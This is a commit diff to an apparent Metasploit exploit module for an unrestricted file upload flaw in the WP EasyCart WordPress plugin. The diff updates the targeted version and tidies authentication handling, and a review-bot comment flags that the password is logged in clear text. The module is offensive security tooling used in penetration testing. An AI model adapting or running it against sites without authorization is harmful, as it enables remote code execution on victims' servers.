Correct version numbers and code tidy up

bug/bundler_fix
rastating 2015-01-19 20:59:46 +00:00
parent 8a89b3be28
commit 9d3397901b
1 changed files with 10 additions and 8 deletions


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info( super(update_info(
info, info,
'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload', 'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This attacker to execute arbitrary PHP code. This
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Jan 08 2015', 'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php', 'Platform' => 'php',
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart < 3.0.16', {}]], 'Targets' => [['wp-easycart < 3.0.17', {}]],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) ))
@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
check_plugin_version_from_readme('wp-easycart', '3.0.16') check_plugin_version_from_readme('wp-easycart', '3.0.17')
end end
def generate_mime_message(payload, date_hash, name, include_req_id) def generate_mime_message(payload, date_hash, name, include_req_id)
@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Authenticating using #{username}:#{password}...") print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password) cookie = wordpress_login(username, password)
if use_ec_authentication if !cookie
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil? if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? print_good("#{peer} - Authenticated with WordPress")
end end
print_good("#{peer} - Authenticated with WordPress") unless cookie.nil?
end end
print_status("#{peer} - Preparing payload...") print_status("#{peer} - Preparing payload...")
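Review bot: The `print_status` call just above the rewritten conditional in the last hunk still interpolates `#{password}` into the status line, so the WordPress credential is written in clear text to the console and to any spooled or saved session log. I would log only the account name, e.g. `print_status("#{peer} - Authenticating as #{username}...")`. The commit restructures the cookie check that follows but leaves this line as it was. The enclosing method starts and ends outside the visible hunk, so I cannot tell whether the password is also logged elsewhere in it.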